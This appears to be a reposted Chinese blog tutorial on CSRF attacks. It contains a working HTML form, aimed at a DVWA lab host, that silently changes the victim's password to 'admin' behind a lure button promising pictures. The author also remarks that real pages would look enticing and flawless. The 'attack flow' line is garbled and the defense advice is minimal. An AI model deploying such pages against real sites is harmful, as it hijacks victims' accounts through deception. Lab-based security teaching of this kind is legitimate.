csrf的攻击流程和原理,以及对人民带来多大危害

Posted 黑客渗透测试技术

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了csrf的攻击流程和原理,以及对人民带来多大危害相关的知识,希望对你有一定的参考价值。

我们大家好,好久没有更新内容是因为这几天太忙,实在抱歉,今天抽点时间出来给大家更新一条文章,这篇文章主要内容的主角:“csrf”相信在有人听说过,但是不知道如何去使用,当然我们做渗透测试目的不是为了去攻击别人,这是违法的,还是遵守国家法律为好。

csrf的攻击流程和原理,以及对人民带来多大危害



角色:小马----小明----黑客

红色代表受害者-----绿色代表好人-----黑色代表坏人

攻击流程:狗估计

如何防范 csrf:不要随便点开陌生 的链接,比如电子邮件,移动短信链接...

csrf的攻击流程和原理,以及对人民带来多大危害


下面我来做个实例演示,

<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.41.145/dvwa/vulnerabilities/csrf/"> <input type="hidden" name="password&#95;new" value="admin" /> <input type="hidden" name="password&#95;conf" value="admin" /> <input type="hidden" name="Change" value="Change" /> <input type="submit" value="美女图片点击查看" /> </form> </body></html>


上面是我简单写出的csrf代码页面,为了大家更容易理解,代码很简单,一看就明白,简单的这些代码却固有你们想不到的威力,拿这个页面想让别人点开是不可能的,我是测试页面,不必要加太多东西,想拿去诱惑别人点击。真正操作起来是看不出任何破绽,页面很诱惑。当然这是一个修改密码的表单页面,当把代码保存文件名为csrf后缀名为html,接下来我们打开看看是什么效果。

以上是关于csrf的攻击流程和原理,以及对人民带来多大危害的主要内容,如果未能解决你的问题,请参考以下文章

用代码来细说Csrf漏洞危害以及防御

CSRF攻击防御原理

什么是CSRF攻击,如何预防

安全测试之跨站请求伪造(CSRF)攻击

CSRF攻击原理

技术干货 | CSRF攻击原理以及防御